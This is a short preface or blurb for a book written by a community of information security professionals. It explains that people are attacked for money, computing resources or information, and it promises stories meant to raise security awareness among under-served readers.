This book is the product of a community of Information Security professionals. It is written to illustrate how we are all interesting targets for various reasons. We may be a source of money for criminals through fraud, we might have computing resources that can be used to launch attacks on someone else, or we may be responsible for protecting valuable information. The reasons we are attacked are legion – and so are the ways we are attacked. Our goal is to raise awareness in a community of people who are under-served. Few of us really want dry lectures about how we should act to protect ourselves. But stories of criminals, corporate espionage, friendship and a little juvenile delinquency – now that is the way to learn.